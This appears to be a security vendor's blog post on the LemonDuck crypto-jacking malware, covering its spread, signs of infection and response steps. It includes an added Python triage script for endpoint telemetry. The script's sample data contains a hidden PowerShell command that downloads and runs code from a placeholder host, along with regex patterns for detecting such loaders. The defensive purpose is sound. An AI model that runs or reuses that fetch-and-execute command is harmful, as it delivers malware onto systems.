
The Hidden Crypto-jacking Lemon Duck Malware. How to prevent, detect and respond?

Cryptocurrency is making news again. No, it is not in the financial world, where there is an endless debate about the legitimacy of cryptocurrencies and their use for financial inclusion. This time it is the tech industry grappling with a modern crypto-mining malware called LemonDuck (it is generally accompanied by a closely related variant, LemonCat). LemonDuck is crypto-jacking malware: it hijacks your computer's processing power to covertly mine cryptocurrency without you ever knowing. Let us understand how to prevent, detect and respond to LemonDuck.

The malware mines the Monero cryptocurrency, which is favoured by crypto-jackers because its transactions are hard to trace and it can be mined on ordinary CPUs. The attackers are also using new smokescreen methods to avoid detection. LemonDuck (and LemonCat) is largely "fileless": much of it runs as PowerShell scripts held in memory and launched from scheduled tasks rather than as conventional executables dropped on disk, so traditional file-scanning antivirus finds little to inspect. Note that "fileless" does not mean "traceless"; the scheduled tasks, PowerShell command lines, and network connections it creates are all evidence a defender can collect. Still, the malware's ability to cover its tracks is perhaps its most worrying feature.

A few other unique characteristics include:

  • Ability to infect Windows hosts, Microsoft Exchange Server, and enterprise-grade Linux systems.
  • Ability to consume all of the system's available CPU resources to mine cryptocurrency.
  • Ability to eliminate competing malware on the system and to patch the very vulnerabilities it used to get in, so that no other attacker can take the machine from it. A machine with no other visible infection and the "known" holes closed is also less likely to draw the attention of SOC (Security Operations Center) analysts.
  • Combines crypto-mining with botnet capabilities, and disables or removes security tools to avoid detection.
  • Ability to keep exploiting old, forgotten vulnerabilities in Windows and Linux systems, because many patching programmes concentrate on newer, high-profile vulnerabilities and leave older ones open.

Recent observations show that LemonDuck also steals credentials, removes security controls, spreads via emails, and moves laterally. It ultimately drops more tools for human-operated activity.

The malware is not new, however. It was first detected more than two years ago in China but is still considered a significant threat for the reasons listed above. It has since been observed in several countries, including the US, Canada, India, Vietnam, Singapore, and almost the entirety of Europe.

Prevent Lemon Duck Malware

When it comes to the initial spread, we have the usual suspects: phishing emails, exploits, and infected USB devices. There have also been reports of more targeted techniques such as brute-force attacks on exposed services, spear-phishing, and business email compromise (BEC).

Once the malware infects a device, it gains access to the Outlook application and sends malicious emails to the victim's contacts on the victim's behalf. Because these messages come from a known, trusted sender inside the organisation, they look far more legitimate than external phishing and are correspondingly more dangerous.

The recent sharp increase in attacks has seen COVID-related themes used in both subject and body, crafted to entice the victim to open the attachment. Other observed subject lines include "goodbye", farewell letters, "broken file", and "This is your order?". The attachment, typically a .doc, .js, or .zip file, carries the loader that launches the malware's PowerShell script.

Hence, the standard precautions against phishing (training and awareness) are required. Beyond that, restrict or block removable USB media, filter or block risky attachment types such as .js files and macro-enabled documents at the mail gateway, and patch the older Windows and Linux vulnerabilities the malware relies on, not only the headline-grabbing new ones.

Detect and Respond to Lemon Duck

Microsoft noted in a blog post that LemonDuck, LemonCat, and similar threats can be detected through close monitoring. Companies can therefore leverage solutions that offer visibility, detection, and response, such as MDR (Managed Detection & Response), EDR (Endpoint Detection & Response), and XDR (Extended Detection and Response). These solutions are configured to flag abnormalities and inconsistencies in process activity, network communications, and data exchange.

Once an anomaly is found, the affected system or device should be isolated from the network. A thorough IoC (Indicators of Compromise) and "patient zero" analysis should then be conducted with appropriate tools. The goal is to identify the attempts to change system-level files, scheduled tasks, and registry keys, confirm the malware, and disinfect the system.

After this, it is important to determine the scope of the infection.

  • Did the malware steal or copy sensitive information from the systems? If yes, is it available on the Dark Web?
  • Did it leave a backdoor to make it easy to come back?
  • What was the scope, and how many systems in the network did it spread through?

A detailed malware forensics analysis can determine all of these.

When should you call forensics experts?

As you will have realised, crypto-jackers are after CPU power to mine more coins. Hence, if you notice any unusual CPU-intensive activity, it should be your cue to call in the experts. Watch out for:

  • Machines running hot, with fans constantly on
  • A sudden spike in server or CPU utilisation
  • Unusual spikes in processing at odd hours, when no legitimate workload should be running
  • Noticeably degraded performance for ordinary tasks

Other than these, the LemonDuck/LemonCat malware has a few more specific indicators: internal spam emails (often with COVID themes) sent from a colleague's mailbox, emails carrying .js or similar script attachments, PowerShell launched from scheduled tasks or from Office applications, large data copying or transfer incidents, and more.
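The detection and triage steps above (flag anomalies, isolate, identify patient zero, determine scope) can be applied to endpoint telemetry. The following is an added example, not code from the original article or from any vendor product. It runs over a small set of constructed process-creation records and flags the three behaviours the article describes: fileless PowerShell that downloads and executes code in memory, a script host launched from Outlook (the internal spam and .js attachments), and sustained CPU use outside business hours. The event fields, host names, thresholds, and business-hours window are assumptions made for the example.

```python
"""Triage constructed endpoint telemetry for LemonDuck-style indicators.

Added example, not code from the original article or from any product.
Event fields, host names, thresholds and the business-hours window are
assumptions chosen to mirror the behaviours the article describes.
"""
import re
from datetime import datetime

# Constructed sample telemetry: one record per process-creation event, with
# the CPU share that process consumed over the following ten minutes.
SAMPLE_EVENTS = [
    {"ts": "2021-07-22T02:14:05", "host": "FIN-WS-07", "image": "powershell.exe",
     "parent": "schtasks.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c IEX "
                "(New-Object Net.WebClient).DownloadString('http://t.example/a.jsp')",
     "cpu_pct": 97.0},
    {"ts": "2021-07-22T02:15:10", "host": "FIN-WS-07", "image": "wscript.exe",
     "parent": "outlook.exe",
     "cmdline": "wscript.exe C:\\Users\\jdoe\\AppData\\Local\\Temp\\readme.js",
     "cpu_pct": 3.0},
    {"ts": "2021-07-22T09:30:00", "host": "HR-WS-02", "image": "excel.exe",
     "parent": "explorer.exe",
     "cmdline": "EXCEL.EXE /e Q3.xlsx", "cpu_pct": 88.0},
    {"ts": "2021-07-22T14:02:33", "host": "DEV-WS-11", "image": "powershell.exe",
     "parent": "code.exe",
     "cmdline": "powershell.exe -NoProfile -File build.ps1", "cpu_pct": 12.0},
]

# Command-line fragments typical of in-memory download-and-execute loaders.
# "-ep bypass" alone is not matched; the group only accepts -e/-enc/-encodedcommand
# followed by whitespace.
FILELESS_PATTERNS = re.compile(
    r"(-e(nc|ncodedcommand)?\s|\bIEX\b|Invoke-Expression|DownloadString|"
    r"-w(indowstyle)?\s+hidden)",
    re.IGNORECASE,
)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe"}
OFFICE_PARENTS = {"outlook.exe", "winword.exe", "excel.exe"}
CPU_THRESHOLD = 80.0          # assumed: sustained share over the sampling window
BUSINESS_HOURS = range(8, 19)  # assumed: 08:00-18:59 local time


def triage(events, cpu_threshold=CPU_THRESHOLD):
    """Return one alert per suspicious event, each with the reasons it fired."""
    alerts = []
    for ev in events:
        reasons = []
        image = ev["image"].lower()
        parent = ev["parent"].lower()

        # 1. Fileless PowerShell: hidden window, encoded or downloaded payload.
        if image in {"powershell.exe", "pwsh.exe"} and FILELESS_PATTERNS.search(ev["cmdline"]):
            reasons.append("fileless PowerShell download/execute")

        # 2. Office application (notably Outlook) spawning a script host,
        #    as when a user opens a .js attachment from an internal spam mail.
        if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
            reasons.append(f"script host spawned by {parent}")

        # 3. Sustained CPU consumption at odd hours, or from a scripting host
        #    at any hour. A busy spreadsheet during the day is left alone.
        hour = datetime.fromisoformat(ev["ts"]).hour
        if ev["cpu_pct"] >= cpu_threshold:
            if hour not in BUSINESS_HOURS:
                reasons.append("sustained CPU spike outside business hours")
            elif image in SCRIPT_HOSTS:
                reasons.append("sustained CPU spike from a scripting host")

        if reasons:
            alerts.append({"host": ev["host"], "ts": ev["ts"],
                           "image": image, "reasons": reasons})
    return alerts


def patient_zero(alerts):
    """Earliest alert by timestamp: the first place to start the investigation."""
    return min(alerts, key=lambda a: a["ts"]) if alerts else None


def affected_hosts(alerts):
    """Set of hosts with at least one alert, i.e. the scope of the infection."""
    return {a["host"] for a in alerts}


if __name__ == "__main__":
    found = triage(SAMPLE_EVENTS)
    for a in found:
        print(a["ts"], a["host"], a["image"], "->", "; ".join(a["reasons"]))
    print("patient zero:", patient_zero(found)["host"] if found else None)
    print("affected hosts:", sorted(affected_hosts(found)))
```

In the constructed data only the finance workstation fires: once for the hidden, downloading PowerShell launched from a scheduled task at 02:14, and once for wscript.exe started by Outlook a minute later. The daytime Excel process at 88% CPU and the developer's build script are left alone, which is the point of combining the CPU signal with time of day and parent-process context rather than alerting on load alone. In practice the same logic would be fed from EDR process telemetry or Sysmon event logs rather than an inline list.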

The Alliant Advantage

The group behind both of these "Lemon" malware families is determined to stay anonymous and get a free ride to crypto wealth on the back of your IT resources. It is time we, as a community, put a check on these bad actors.

Alliant Cybersecurity offers SOC as a Service, Malware Analysis, Patient Zero Identification, and other cybersecurity services. We are a team of technical experts and industry leaders with decades of experience in cybersecurity, professional services, and legislation.

Get the Alliant Cybersecurity advantage now!